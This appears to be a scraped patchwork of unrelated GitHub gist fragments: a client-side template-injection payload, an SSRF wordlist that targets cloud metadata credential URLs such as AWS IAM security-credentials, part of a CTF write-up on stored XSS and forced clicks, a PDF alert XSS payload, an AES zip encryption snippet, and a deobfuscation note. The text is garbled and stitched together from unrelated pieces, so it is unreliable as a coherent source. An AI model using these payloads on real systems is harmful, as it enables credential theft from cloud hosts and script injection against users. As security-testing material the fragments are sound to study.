{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
BuffaloWill
/ cloud_metadata.txt
Last active
November 26, 2025 00:24
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:
- Stored XSS on user profile page.
It's also possible to make victim browser trigger a click on injected element
if(location.hash.slice(1) == 'report'){
document.getElementById('report-btn').click();
danifus
/ create_aes_zip.py
Created
July 27, 2019 03:18
Implementing Winzip AES encryption / decryption with zipfile refactor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import zipfile | |
| import zipfile_aes | |
| secret_password = b'lost art of keeping a secret' | |
| with zipfile_aes.AESZipFile('new_test.zip', | |
| 'w', | |
| compression=zipfile.ZIP_LZMA, | |
| encryption=zipfile_aes.WZ_AES) as zf: | |
| zf.setpassword(secret_password) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
0xdevalias
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active
December 5, 2025 00:13
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code.